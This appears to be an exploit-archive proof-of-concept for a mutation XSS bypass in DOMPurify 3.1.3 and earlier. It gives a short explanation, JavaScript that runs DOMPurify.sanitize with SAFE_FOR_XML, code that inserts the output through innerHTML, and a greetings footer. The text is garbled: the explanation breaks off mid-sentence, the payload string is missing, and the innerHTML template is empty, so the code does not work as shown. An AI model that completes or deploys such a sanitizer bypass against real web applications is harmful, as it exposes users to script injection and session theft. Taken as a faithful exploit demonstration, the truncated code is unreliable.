=============================================================================================================================================
| # Title : DOMPurify ≤ 3.1.3 Mutation XSS via closing tag during sanitization, a crafted payload can bypass filtering mechanisms.
The sanitizer processes the input as inert text, while the browser's HTML parser interprets it as executable markup when inserted into a `;
const config = {
SAFE_FOR_XML: true
};
const clean = DOMPurify.sanitize(payload, config);
console.log("Sanitized output:", clean);
const container = document.createElement("div");
container.innerHTML = ``;
document.body.appendChild(container);
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================